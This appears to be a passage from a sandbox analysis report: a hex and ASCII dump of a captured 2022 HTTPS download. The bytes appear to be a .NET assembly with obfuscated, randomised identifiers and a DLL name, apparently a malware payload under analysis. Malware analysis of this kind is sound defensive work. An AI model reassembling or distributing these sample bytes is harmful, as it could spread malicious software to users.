14 01 00 00 00 34 34 00 00 00 01 45 4d 54 d6 d6 54
                  Data Ascii: //KKKK00dggddggd112O((O22O((O222mmmm33<<<<44EMTT
                  2022-08-08 20:21:09 UTC20INData Raw: 4d 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 4c 4c 00 00 00 01 10 fa 43 93 93 43 fa 10 01 10 fa 43 d1 d1 43 fa 10 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 4d 4d 00 00 00 01 65 b2 63 8a 8a 63 b2 65 01 65 b2 63 ff ff 63 b2 65 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 4e 4e 00 00 00 01 4b 2b cb ea ea cb 2b 4b 01 4b 2b cb 93 93 cb 2b 4b 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 4f 4f 00 00 00 01 16 9d 9a 2e 2e 9a 9d 16 01 16 9d 9a 0e 0e 9a 9d 16 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 50 50 00 00 00 01 09 a8 9b 11 11 9b a8 09 01 09 a8 9b 77 77 9b a8 09 06 15 11 00 00 00 05 05 00 00 00 01 00 00
                  Data Ascii: MLLCCCCMMecceecceNNK++KK++KOO..PPww
                  2022-08-08 20:21:09 UTC21INData Raw: 00 68 68 00 00 00 01 5e 50 b3 6c 6c b3 50 5e 01 5e 50 b3 1b 1b b3 50 5e 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 69 69 00 00 00 01 6c 13 b1 74 74 b1 13 6c 01 6c 13 b1 03 03 b1 13 6c 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6a 6a 00 00 00 01 09 a8 84 c6 c6 84 a8 09 01 09 a8 84 b1 b1 84 a8 09 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6b 6b 00 00 00 01 50 9e 93 66 66 93 9e 50 01 50 9e 93 48 48 93 9e 50 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6c 6c 00 00 00 01 66 0c e7 09 09 e7 0c 66 01 66 0c e7 68 68 e7 0c 66 06 15 11 00 00 00 05 05 00 00 00 01 00 00 00 00 00 00 00 00 14 01 00 00 00 6d 6d 00 00 00 01 62 b3 c7 2b 2b c7 b3 62
                  Data Ascii: hh^PllP^^PP^iilttllljjkkPffPPHHPllfffhhfmmb++b
                  2022-08-08 20:21:09 UTC22INData Raw: 00 03 00 00 00 26 00 00 00 06 00 00 00 0c 00 00 00 10 00 00 00 0f 00 00 00 01 00 00 00 01 00 00 00 05 00 00 00 01 00 00 00 10 00 00 00 04 00 00 00 14 00 00 00 00 00 0b 0b 01 00 00 00 00 00 06 00 6a 05 6d 0b 06 00 71 09 6d 0b 06 00 2b 12 6d 0b 06 00 64 00 6d 0b 06 00 7b 00 6d 0b 12 00 c9 11 4b 0f 06 00 41 0d 6d 0b 06 00 5d 0a 6d 0b 06 00 aa 0c 6d 0b 06 00 bf 12 6d 0b 06 00 38 0f 6d 0b 0a 00 3a 06 9a 0f 06 00 58 07 4b 0f 12 00 89 07 f5 0a 12 00 ca 06 f5 0a 12 00 41 07 12 0e 0a 00 a6 0e 5e 0f 06 00 41 08 4b 0f 0a 00 54 0e 9a 0f 12 00 13 07 df 0b 0a 00 e5 07 59 03 0a 00 cd 07 e3 0f 06 00 91 11 0a 10 06 00 a7 05 6d 0b 06 00 9f 04 6d 0b 06 00 21 0f 6d 0b 0a 00 89 08 59 03 0a 00 0f 00 cb 0a 06 00 a2 07 c4 0f 0e 00 b6 12 25 0d 06 00 39 00 3e 03 06 00 01 00 3e 03
                  Data Ascii: &jmqm+mdm{mKAm]mmm8m:XKA^AKTYmm!mY%9>>
                  2022-08-08 20:21:09 UTC24INData Raw: 77 00 02 00 60 2f 00 00 00 00 83 00 a4 05 a2 01 02 00 7c 2f 00 00 00 00 46 02 51 0a ab 01 02 00 94 2f 00 00 00 00 11 00 06 03 c3 01 02 00 c0 2f 00 00 00 00 01 00 f2 02 d0 01 03 00 de 2f 00 00 00 00 06 18 2b 0f 8a 00 04 00 ec 2f 00 00 00 00 03 08 28 04 02 01 04 00 2c 30 00 00 00 00 06 18 2b 0f 8a 00 04 00 de 2f 00 00 00 00 01 18 2b 0f 8a 00 04 00 44 30 00 00 00 00 16 08 76 09 a9 02 04 00 a4 30 00 00 00 00 16 08 80 09 c0 02 05 00 04 31 00 00 00 00 16 08 8a 09 dc 02 07 00 6c 31 00 00 00 00 16 08 9d 09 f2 02 09 00 cc 31 00 00 00 00 16 08 8a 09 01 03 0c 00 ea 31 00 00 00 00 16 08 9d 09 0a 03 0e 00 f8 31 00 00 00 00 16 00 fd 07 1b 03 11 00 24 32 00 00 00 00 16 00 28 07 33 03 13 00 4c 32 00 00 00 00 16 00 cd 10 49 03 15 00 ac 32 00 00 00 00 16 00 cd 10 bb 03 19
                  Data Ascii: w`/|/FQ///+/(,0+/+D0v01l1111$2(3L2I2
                  2022-08-08 20:21:09 UTC25INData Raw: 00 01 00 a0 0a 00 00 01 00 3c 05 00 00 01 00 19 03 00 00 02 00 d2 02 00 00 01 00 e1 11 00 00 02 00 ed 09 00 00 01 00 e7 00 00 00 02 00 ed 12 00 00 01 00 74 0a 00 00 02 00 e4 03 00 00 03 00 90 0a 00 00 04 00 f7 00 00 00 01 00 36 13 00 00 01 00 74 0a 00 00 02 00 e4 03 00 00 03 00 90 0a 00 00 01 00 25 12 00 00 02 00 e8 03 00 00 01 00 19 03 00 00 02 00 b2 0a 00 00 03 00 9e 06 00 00 01 00 9b 12 00 00 01 00 19 03 00 00 01 00 25 12 00 00 02 00 e8 03 00 00 01 00 55 05 00 00 02 00 73 05 00 00 03 00 e7 10 00 00 04 00 bc 10 00 00 05 00 a1 10 00 00 06 00 21 11 00 00 07 00 cb 12 00 00 08 00 b3 13 00 00 09 00 dc 0c 00 00 0a 00 1a 0c 00 00 0b 00 b2 0a 00 00 0c 00 9e 06 00 00 01 00 dc 0c 00 00 02 00 1a 0c 00 00 03 00 9b 12 00 00 01 00 55 05 00 00 02 00 73 05 00 00 03 00
                  Data Ascii: <t6t%%Us!Us
                  2022-08-08 20:21:09 UTC26INData Raw: 70 12 ec 04 89 01 6c 0e f1 04 99 01 59 0e fa 04 89 01 ae 13 10 05 59 00 de 09 2e 05 89 01 58 00 32 05 a1 01 62 00 37 05 a9 01 69 01 3e 05 a9 01 5a 0a 44 05 41 00 7c 12 4a 05 a1 01 81 00 51 05 41 00 08 12 d9 05 89 01 f2 09 df 05 41 00 d0 13 e5 05 41 00 01 12 ea 05 59 00 e8 0c f1 05 49 00 2b 0f 8a 00 b1 01 a9 13 f4 05 a1 01 06 11 01 06 c1 01 d2 0e 07 06 31 00 96 03 0d 06 31 00 2a 0b 8a 00 c1 01 c0 0e 73 00 51 01 27 13 22 06 51 01 02 13 22 06 41 00 d8 13 a1 04 41 00 f5 03 33 06 c9 01 81 06 39 06 19 00 59 11 60 07 c1 00 9c 13 66 07 f1 01 2b 0f 6c 07 11 02 d7 03 e7 07 09 02 2b 0f 8a 00 19 02 2b 0f 85 00 21 02 2b 0f 85 00 29 02 2b 0f 85 00 31 02 2b 0f 85 00 39 02 2b 0f 85 00 41 02 2b 0f 85 00 49 02 2b 0f 85 00 51 02 2b 0f d3 08 61 02 2b 0f e3 08 69 02 2b 0f 8a
                  Data Ascii: plYY.X2b7i>ZDA|JQAAAYI+11*sQ'"Q"AA39Y`f+l++!+)+1+9+A+I+Q+a+i+
                  2022-08-08 20:21:09 UTC28INData Raw: 03 69 00 aa 03 67 00 b6 03 73 00 02 04 5a 00 ad 04 a1 00 be 01 5a 00 a7 05 5a 00 ac 05 5a 00 b1 05 5a 00 b6 05 5a 00 bb 05 5a 00 c0 05 5a 00 c5 05 5a 00 ca 05 5a 00 cf 05 5a 00 d4 05 cb 00 2f 06 cd 00 2f 06 00 49 45 6e 75 6d 65 72 61 62 6c 65 60 31 00 43 6f 6e 74 65 78 74 56 61 6c 75 65 60 31 00 54 68 72 65 61 64 53 61 66 65 4f 62 6a 65 63 74 50 72 6f 76 69 64 65 72 60 31 00 49 45 6e 75 6d 65 72 61 74 6f 72 60 31 00 4c 69 73 74 60 31 00 52 65 73 65 72 76 65 64 31 00 52 65 61 64 49 6e 74 33 32 00 54 6f 49 6e 74 33 32 00 46 75 6e 63 60 32 00 52 65 73 65 72 76 65 64 32 00 49 6e 74 36 34 00 54 6f 49 6e 74 31 36 00 3c 4d 6f 64 75 6c 65 3e 00 67 65 74 45 6e 63 6f 64 69 6e 67 43 4d 53 53 45 43 54 49 4f 4e 45 4e 54 52 59 49 44 4d 45 54 41 44 41 54 41 00 65 72 49
                  Data Ascii: igsZZZZZZZZZZZ//IEnumerable`1ContextValue`1ThreadSafeObjectProvider`1IEnumerator`1List`1Reserved1ReadInt32ToInt32Func`2Reserved2Int64ToInt16<Module>getEncodingCMSSECTIONENTRYIDMETADATAerI
                  2022-08-08 20:21:09 UTC29INData Raw: 65 70 4a 6f 69 6e 67 65 74 54 68 72 65 65 4c 65 74 74 65 72 49 53 4f 4c 61 6e 67 75 61 67 65 4e 61 6d 65 00 67 65 74 5f 4d 6f 64 75 6c 65 4e 61 6d 65 00 67 65 74 5f 4c 6f 63 61 6c 4e 61 6d 65 00 61 70 70 6c 69 63 61 74 69 6f 6e 4e 61 6d 65 00 6e 61 6d 65 00 44 61 74 65 54 69 6d 65 00 63 6f 6d 6d 61 6e 64 4c 69 6e 65 00 56 61 6c 75 65 54 79 70 65 00 4e 6f 50 72 69 6e 63 69 70 61 6c 4d 61 6b 65 50 6f 69 6e 74 65 72 54 79 70 65 00 47 65 74 54 79 70 65 00 74 79 70 65 00 53 79 73 74 65 6d 2e 43 6f 72 65 00 52 65 6d 6f 76 65 4e 61 6d 65 73 70 61 63 65 41 74 74 72 69 62 75 74 65 73 43 6c 6f 73 75 72 65 00 52 65 61 6c 50 72 6f 78 79 46 6c 61 67 73 42 61 64 53 69 67 6e 61 74 75 72 65 00 67 65 74 5f 43 75 6c 74 75 72 65 00 73 65 74 5f 43 75 6c 74 75 72 65 00 72 65
                  Data Ascii: epJoingetThreeLetterISOLanguageNameget_ModuleNameget_LocalNameapplicationNamenameDateTimecommandLineValueTypeNoPrincipalMakePointerTypeGetTypetypeSystem.CoreRemoveNamespaceAttributesClosureRealProxyFlagsBadSignatureget_Cultureset_Culturere
                  2022-08-08 20:21:09 UTC30INData Raw: 67 66 4e 4a 71 68 00 70 61 74 68 00 6c 65 6e 67 74 68 00 55 61 79 74 50 50 48 4a 59 55 63 53 4f 4b 6a 00 6c 48 64 43 41 58 50 59 5a 70 48 65 57 55 6a 00 6f 62 6a 00 41 73 79 6e 63 43 61 6c 6c 62 61 63 6b 00 44 65 6c 65 67 61 74 65 43 61 6c 6c 62 61 63 6b 00 4d 61 72 73 68 61 6c 00 4d 69 63 72 6f 73 6f 66 74 2e 56 69 73 75 61 6c 42 61 73 69 63 2e 4d 79 53 65 72 76 69 63 65 73 2e 49 6e 74 65 72 6e 61 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 52 65 61 6c 50 72 6f 78 79 46 6c 61 67 73 42 61 64 53 69 67 6e 61 74 75 72 65 2e 64 6c 6c 00 4b 69 6c 6c 00 4d 65 6d 6f 72 79 42 61 72 72 69 65 72 73 65 74 41 73 42 6f 6f 6c 00 4d 65 6d 6f 72 79 42 61 72 72 69 65 72 55 43 4f 4d 49 53 74 72 65 61 6d 00 65 6c 65 6d 00 67 65 74 5f 49 74 65 6d
                  Data Ascii: gfNJqhpathlengthUaytPPHJYUcSOKjlHdCAXPYZpHeWUjobjAsyncCallbackDelegateCallbackMarshalMicrosoft.VisualBasic.MyServices.InternalSystem.ComponentModelRealProxyFlagsBadSignature.dllKillMemoryBarriersetAsBoolMemoryBarrierUCOMIStreamelemget_Item
                  2022-08-08 20:21:09 UTC31INData Raw: 43 6f 6d 70 75 74 65 72 00 54 6f 4c 6f 77 65 72 00 53 74 64 45 72 72 6f 72 00 43 6c 65 61 72 50 72 6f 6a 65 63 74 45 72 72 6f 72 00 53 65 74 50 72 6f 6a 65 63 74 45 72 72 6f 72 00 73 65 74 44 79 6e 61 6d 69 63 42 61 73 65 4e 75 6d 62 65 72 44 65 63 69 6d 61 6c 53 65 70 61 72 61 74 6f 72 00 49 45 6e 75 6d 65 72 61 74 6f 72 00 47 65 74 45 6e 75 6d 65 72 61 74 6f 72 00 41 63 74 69 76 61 74 6f 72 00 2e 63 74 6f 72 00 2e 63 63 74 6f 72 00 49 6e 74 50 74 72 00 6d 5f 69 6e 53 63 6f 70 65 4e 73 00 53 79 73 74 65 6d 2e 44 69 61 67 6e 6f 73 74 69 63 73 00 4d 69 63 72 6f 73 6f 66 74 2e 56 69 73 75 61 6c 42 61 73 69 63 2e 44 65 76 69 63 65 73 00 67 65 74 5f 57 65 62 53 65 72 76 69 63 65 73 00 4d 79 57 65 62 53 65 72 76 69 63 65 73 00 4d 69 63 72 6f 73 6f 66 74 2e 56
                  Data Ascii: ComputerToLowerStdErrorClearProjectErrorSetProjectErrorsetDynamicBaseNumberDecimalSeparatorIEnumeratorGetEnumeratorActivator.ctor.cctorIntPtrm_inScopeNsSystem.DiagnosticsMicrosoft.VisualBasic.Devicesget_WebServicesMyWebServicesMicrosoft.V
                  2022-08-08 20:21:09 UTC33INData Raw: 6b 00 4e 00 75 00 6d 00 62 00 65 00 72 00 41 00 6e 00 73 00 69 00 43 00 6c 00 61 00 73 00 73 00 32 00 33 00 43 00 68 00 75 00 6e 00 6b 00 4e 00 75 00 6d 00 62 00 65 00 72 00 41 00 6e 00 73 00 69 00 43 00 6c 00 61 00 73 00 73 00 6c 00 65 00 6e 00 72 00 43 00 68 00 75 00 6e 00 6b 00 4e 00 75 00 6d 00 62 00 65 00 72 00 41 00 6e 00 73 00 69 00 43 00 6c 00 61 00 73 00 73 00 65 00 6b 00 43 00 68 00 75 00 6e 00 6b 00 4e 00 75 00 6d 00 62 00 65 00 72 00 41 00 6e 00 73 00 69 00 43 00 6c 00 61 00 73 00 73 00 00 29 43 00 68 00 75 00 6e 00 6b 00 4e 00 75 00 6d 00 62 00 65 00 72 00 41 00 6e 00 73 00 69 00 43 00 6c 00 61 00 73 00 73 00 00 83 43 65 00 4d 00 75 00 47 00 49 00 55 00 4c 00 78 00 7a 00 53 00 53 00 57 00 42 00 46 00 76 00 6f 00 47 00 6d 00 46 00 72 00 79 00
                  Data Ascii: kNumberAnsiClass23ChunkNumberAnsiClasslenrChunkNumberAnsiClassekChunkNumberAnsiClass)ChunkNumberAnsiClassCeMuGIULxzSSWBFvoGmFry
                  2022-08-08 20:21:09 UTC34INData Raw: 59 00 67 00 67 00 54 00 50 00 58 00 63 00 43 00 6b 00 6c 00 6c 00 79 00 6e 00 4c 00 74 00 77 00 64 00 46 00 42 00 6f 00 6a 00 6f 00 54 00 68 00 6c 00 4a 00 6a 00 4e 00 4d 00 51 00 53 00 55 00 48 00 4a 00 62 00 79 00 51 00 67 00 51 00 41 00 63 00 46 00 55 00 52 00 6b 00 7a 00 72 00 51 00 45 00 49 00 6b 00 48 00 41 00 72 00 6c 00 54 00 77 00 41 00 44 00 51 00 70 00 41 00 6d 00 59 00 7a 00 4b 00 72 00 7a 00 6b 00 50 00 67 00 77 00 4a 00 42 00 4d 00 64 00 6f 00 57 00 52 00 47 00 6e 00 53 00 4a 00 59 00 67 00 67 00 54 00 50 00 58 00 63 00 43 00 6b 00 64 00 2e 00 32 00 33 00 6c 00 79 00 6e 00 4c 00 74 00 77 00 64 00 46 00 42 00 6f 00 6a 00 6f 00 54 00 68 00 6c 00 4a 00 6a 00 4e 00 4d 00 51 00 53 00 55 00 48 00 4a 00 62 00 79 00 51 00 67 00 51 00 41 00 63 00 46
                  Data Ascii: YggTPXcCkllynLtwdFBojoThlJjNMQSUHJbyQgQAcFURkzrQEIkHArlTwADQpAmYzKrzkPgwJBMdoWRGnSJYggTPXcCkd.23lynLtwdFBojoThlJjNMQSUHJbyQgQAcF
                  2022-08-08 20:21:09 UTC35INData Raw: 00 73 00 73 00 7a 00 6b 00 71 00 72 00 67 00 4a 00 47 00 6b 00 6c 00 6e 00 44 00 67 00 45 00 49 00 69 00 4a 00 77 00 66 00 73 00 5a 00 50 00 58 00 50 00 73 00 70 00 79 00 67 00 50 00 55 00 4e 00 6e 00 69 00 6a 00 54 00 46 00 6a 00 4e 00 65 00 46 00 45 00 4b 00 52 00 45 00 41 00 75 00 6a 00 69 00 65 00 64 00 58 00 4d 00 73 00 69 00 51 00 72 00 62 00 71 00 79 00 42 00 43 00 64 00 4c 00 50 00 74 00 55 00 55 00 77 00 6b 00 43 00 55 00 76 00 52 00 76 00 4a 00 50 00 54 00 6f 00 4f 00 53 00 47 00 50 00 65 00 63 00 6f 00 72 00 7a 00 6b 00 71 00 72 00 67 00 4a 00 47 00 6b 00 6c 00 6e 00 44 00 67 00 45 00 49 00 69 00 4a 00 77 00 66 00 73 00 5a 00 50 00 58 00 50 00 73 00 70 00 79 00 67 00 50 00 55 00 4e 00 6e 00 69 00 6a 00 54 00 46 00 6a 00 4e 00 65 00 46 00 45 00
                  Data Ascii: sszkqrgJGklnDgEIiJwfsZPXPspygPUNnijTFjNeFEKREAujiedXMsiQrbqyBCdLPtUUwkCUvRvJPToOSGPecorzkqrgJGklnDgEIiJwfsZPXPspygPUNnijTFjNeFE
                  2022-08-08 20:21:09 UTC37INData Raw: 4f 00 6a 00 63 00 58 00 62 00 54 00 42 00 4b 00 41 00 5a 00 48 00 53 00 63 00 65 00 78 00 75 00 53 00 74 00 42 00 74 00 49 00 77 00 67 00 76 00 6d 00 61 00 45 00 54 00 73 00 5a 00 55 00 64 00 49 00 59 00 62 00 4c 00 4b 00 58 00 43 00 51 00 52 00 64 00 4f 00 4e 00 55 00 53 00 76 00 63 00 70 00 61 00 53 00 77 00 52 00 44 00 71 00 52 00 44 00 68 00 46 00 41 00 4f 00 44 00 6d 00 62 00 46 00 64 00 4b 00 59 00 44 00 6c 00 46 00 76 00 68 00 54 00 74 00 58 00 47 00 52 00 41 00 50 00 56 00 53 00 78 00 79 00 4f 00 6a 00 63 00 58 00 62 00 54 00 42 00 4b 00 41 00 5a 00 48 00 53 00 63 00 65 00 78 00 75 00 53 00 74 00 42 00 74 00 49 00 77 00 67 00 76 00 6d 00 61 00 45 00 54 00 73 00 5a 00 55 00 64 00 49 00 59 00 62 00 4c 00 4b 00 58 00 43 00 51 00 52 00 64 00 4f 00 4e
                  Data Ascii: OjcXbTBKAZHScexuStBtIwgvmaETsZUdIYbLKXCQRdONUSvcpaSwRDqRDhFAODmbFdKYDlFvhTtXGRAPVSxyOjcXbTBKAZHScexuStBtIwgvmaETsZUdIYbLKXCQRdON
                  2022-08-08 20:21:09 UTC38INData Raw: 00 7a 00 74 00 4f 00 58 00 52 00 48 00 56 00 48 00 50 00 48 00 45 00 64 00 52 00 59 00 53 00 48 00 44 00 55 00 6f 00 63 00 4d 00 79 00 6a 00 70 00 4e 00 41 00 61 00 79 00 79 00 49 00 65 00 65 00 6e 00 72 00 65 00 53 00 76 00 59 00 79 00 51 00 41 00 59 00 43 00 47 00 42 00 52 00 43 00 55 00 61 00 70 00 42 00 57 00 61 00 46 00 57 00 42 00 4a 00 74 00 4b 00 51 00 43 00 57 00 65 00 78 00 65 00 74 00 6e 00 77 00 50 00 59 00 41 00 67 00 52 00 4e 00 6b 00 76 00 7a 00 74 00 73 00 63 00 46 00 72 00 74 00 4e 00 4f 00 7a 00 74 00 4f 00 58 00 52 00 48 00 56 00 48 00 50 00 48 00 45 00 64 00 52 00 59 00 53 00 48 00 44 00 55 00 6f 00 63 00 4d 00 79 00 6a 00 70 00 4e 00 41 00 61 00 79 00 79 00 49 00 65 00 65 00 6e 00 72 00 65 00 53 00 76 00 59 00 79 00 51 00 41 00 59 00
                  Data Ascii: ztOXRHVHPHEdRYSHDUocMyjpNAayyIeenreSvYyQAYCGBRCUapBWaFWBJtKQCWexetnwPYAgRNkvztscFrtNOztOXRHVHPHEdRYSHDUocMyjpNAayyIeenreSvYyQAY
                  2022-08-08 20:21:09 UTC39INData Raw: 49 00 45 00 68 00 56 00 64 00 49 00 42 00 4f 00 68 00 6a 00 64 00 75 00 5a 00 64 00 47 00 47 00 64 00 61 00 61 00 49 00 72 00 7a 00 44 00 64 00 44 00 46 00 42 00 45 00 50 00 53 00 77 00 55 00 56 00 56 00 6f 00 71 00 64 00 5a 00 6c 00 4d 00 67 00 6c 00 4b 00 6e 00 54 00 4f 00 72 00 7a 00 44 00 4a 00 4b 00 41 00 53 00 41 00 6a 00 64 00 56 00 5a 00 6d 00 65 00 72 00 68 00 54 00 63 00 78 00 76 00 4c 00 5a 00 50 00 41 00 68 00 65 00 72 00 58 00 78 00 6f 00 52 00 64 00 4a 00 51 00 53 00 46 00 58 00 49 00 47 00 49 00 45 00 68 00 56 00 64 00 49 00 42 00 4f 00 68 00 6a 00 64 00 75 00 5a 00 64 00 47 00 47 00 64 00 61 00 61 00 49 00 72 00 7a 00 44 00 64 00 44 00 46 00 42 00 45 00 50 00 53 00 77 00 55 00 56 00 56 00 6f 00 71 00 64 00 5a 00 6c 00 4d 00 67 00 6c 00 4b
                  Data Ascii: IEhVdIBOhjduZdGGdaaIrzDdDFBEPSwUVVoqdZlMglKnTOrzDJKASAjdVZmerhTcxvLZPAherXxoRdJQSFXIGIEhVdIBOhjduZdGGdaaIrzDdDFBEPSwUVVoqdZlMglK
                  2022-08-08 20:21:09 UTC41INData Raw: 63 00 76 00 43 00 55 00 47 00 4c 00 55 00 59 00 48 00 6a 00 6c 00 6a 00 6e 00 76 00 7a 00 4b 00 70 00 53 00 4b 00 54 00 66 00 48 00 68 00 6a 00 59 00 64 00 4a 00 47 00 6b 00 78 00 6f 00 75 00 51 00 73 00 48 00 69 00 62 00 45 00 6e 00 54 00 50 00 5a 00 51 00 61 00 78 00 69 00 6e 00 75 00 6b 00 7a 00 54 00 51 00 4d 00 44 00 51 00 71 00 00 82 ad 79 00 72 00 69 00 6e 00 52 00 64 00 57 00 6a 00 49 00 4b 00 75 00 4c 00 6e 00 76 00 6e 00 52 00 44 00 47 00 41 00 4d 00 45 00 46 00 71 00 48 00 6d 00 4b 00 71 00 4f 00 56 00 6c 00 7a 00 58 00 69 00 4e 00 77 00 6c 00 55 00 6f 00 48 00 4b 00 77 00 41 00 6d 00 47 00 66 00 47 00 50 00 4d 00 47 00 54 00 51 00 4d 00 6c 00 56 00 54 00 4b 00 41 00 61 00 42 00 47 00 6d 00 64 00 4f 00 57 00 66 00 58 00 64 00 76 00 79 00 43 00
                  Data Ascii: cvCUGLUYHjljnvzKpSKTfHhjYdJGkxouQsHibEnTPZQaxinukzTQMDQqyrinRdWjIKuLnvnRDGAMEFqHmKqOVlzXiNwlUoHKwAmGfGPMGTQMlVTKAaBGmdOWfXdvyC
                  2022-08-08 20:21:09 UTC42INData Raw: 52 00 79 00 41 00 4c 00 49 00 56 00 68 00 42 00 4f 00 51 00 51 00 42 00 4d 00 53 00 74 00 64 00 53 00 6e 00 77 00 6d 00 45 00 49 00 54 00 74 00 76 00 6b 00 45 00 41 00 70 00 59 00 66 00 63 00 64 00 51 00 6f 00 50 00 48 00 70 00 6a 00 54 00 5a 00 69 00 43 00 4e 00 4c 00 6e 00 42 00 46 00 63 00 73 00 51 00 49 00 65 00 69 00 56 00 70 00 61 00 6d 00 42 00 71 00 6d 00 47 00 68 00 74 00 48 00 46 00 74 00 48 00 42 00 58 00 6f 00 6c 00 6b 00 76 00 64 00 63 00 55 00 4f 00 44 00 42 00 41 00 6a 00 76 00 46 00 51 00 4c 00 52 00 79 00 41 00 4c 00 49 00 56 00 68 00 42 00 4f 00 51 00 51 00 42 00 4d 00 53 00 74 00 64 00 53 00 6e 00 77 00 6d 00 45 00 49 00 54 00 74 00 76 00 6b 00 45 00 41 00 70 00 59 00 66 00 63 00 64 00 51 00 6f 00 50 00 48 00 70 00 6a 00 54 00 5a 00 69
                  Data Ascii: RyALIVhBOQQBMStdSnwmEITtvkEApYfcdQoPHpjTZiCNLnBFcsQIeiVpamBqmGhtHFtHBXolkvdcUODBAjvFQLRyALIVhBOQQBMStdSnwmEITtvkEApYfcdQoPHpjTZi
                  2022-08-08 20:21:09 UTC43INData Raw: 46 00 66 00 5a 00 4b 00 68 00 73 00 58 00 4c 00 48 00 72 00 50 00 46 00 47 00 55 00 42 00 4a 00 59 00 42 00 51 00 48 00 43 00 44 00 4f 00 4a 00 70 00 6d 00 4a 00 4f 00 45 00 68 00 57 00 75 00 64 00 70 00 73 00 4c 00 43 00 74 00 51 00 71 00 79 00 6b 00 54 00 4c 00 00 83 43 64 00 4e 00 7a 00 4e 00 59 00 51 00 53 00 55 00 6c 00 6a 00 57 00 63 00 42 00 6c 00 51 00 71 00 50 00 44 00 65 00 48 00 76 00 56 00 70 00 77 00 52 00 77 00 71 00 47 00 66 00 6c 00 76 00 4a 00 6e 00 46 00 44 00 51 00 4c 00 5a 00 47 00 53 00 47 00 69 00 46 00 4c 00 48 00 68 00 72 00 75 00 48 00 58 00 41 00 48 00 6f 00 63 00 74 00 70 00 73 00 58 00 51 00 77 00 61 00 4c 00 6f 00 7a 00 49 00 4e 00 70 00 52 00 68 00 55 00 66 00 4b 00 53 00 68 00 57 00 4d 00 6b 00 65 00 6f 00 45 00 46 00 51 00
                  Data Ascii: FfZKhsXLHrPFGUBJYBQHCDOJpmJOEhWudpsLCtQqykTLCdNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQ
                  2022-08-08 20:21:09 UTC45INData Raw: 4d 79 54 65 6d 70 6c 61 74 65 08 31 31 2e 30 2e 30 2e 30 00 00 07 06 15 12 18 01 12 0c 07 06 15 12 18 01 12 08 07 06 15 12 18 01 12 4d 07 06 15 12 18 01 12 14 06 15 12 18 01 12 0c 06 15 12 18 01 12 08 06 15 12 18 01 12 4d 06 15 12 18 01 12 14 04 07 01 12 0c 04 20 00 13 00 04 00 00 12 0c 04 07 01 12 08 04 00 00 12 08 04 07 01 12 4d 04 00 00 12 4d 04 07 01 12 14 04 00 00 12 14 04 08 00 12 0c 10 01 00 0b 4d 79 2e 43 6f 6d 70 75 74 65 72 00 00 04 08 00 12 08 13 01 00 0e 4d 79 2e 41 70 70 6c 69 63 61 74 69 6f 6e 00 00 04 08 00 12 4d 0c 01 00 07 4d 79 2e 55 73 65 72 00 00 04 08 00 12 14 13 01 00 0e 4d 79 2e 57 65 62 53 65 72 76 69 63 65 73 00 00 03 07 01 02 04 00 01 1c 1c 04 20 01 02 1c 03 07 01 08 04 07 01 12 61 06 00 01 12 61 11 65 04 20 00 12 61 03 07 01 0e
                  Data Ascii: MyTemplate11.0.0.0MM MMMy.ComputerMy.ApplicationMMy.UserMy.WebServices aae a
                  2022-08-08 20:21:09 UTC46INData Raw: 05 08 05 00 01 01 12 25 05 00 01 12 19 08 08 00 04 02 0e 0e 1d 05 02 05 07 03 0e 0e 0e 0c 10 01 01 1e 00 15 12 80 81 01 1e 00 03 0a 01 0e 05 20 02 0e 0e 0e 04 00 01 0e 0e 05 00 01 0e 1d 0e 07 00 03 02 0e 0e 1d 05 0a 20 03 12 80 ed 0e 12 80 f1 1c 06 20 01 18 12 80 ed 04 20 01 18 0e 17 20 0c 12 80 ed 0e 0e 18 18 02 09 18 0e 10 11 58 10 11 54 12 80 f1 1c 0c 20 03 02 10 11 58 10 11 54 12 80 ed 11 20 0a 02 0e 0e 18 18 02 09 18 0e 10 11 58 10 11 54 0c 20 04 12 80 ed 18 1d 08 12 80 f1 1c 06 20 01 02 12 80 ed 06 20 02 02 18 1d 08 10 20 07 12 80 ed 18 08 10 08 08 10 08 12 80 f1 1c 0a 20 03 02 10 08 10 08 12 80 ed 0a 20 05 02 18 08 10 08 08 10 08 10 20 07 12 80 ed 18 08 1d 05 08 10 08 12 80 f1 1c 08 20 02 02 10 08 12 80 ed 0a 20 05 02 18 08 1d 05 08 10 08 0b 20 04
                  Data Ascii: % XT XT XT
                  2022-08-08 20:21:09 UTC47INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 03 00 00 00 28 00 00 80 0e 00 00 00 68 00 00 80 10 00 00 00 80 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 02 00 00 00 98 00 00 80 03 00 00 00 b0 00 00 80 04 00 00 00 c8 00 00 80 05 00 00 00 e0 00 00 80 06 00 00 00 f8 00 00 80 07 00 00 00 10 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 7f 00 00 28 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 40 01 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 58 01 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: (h(@X
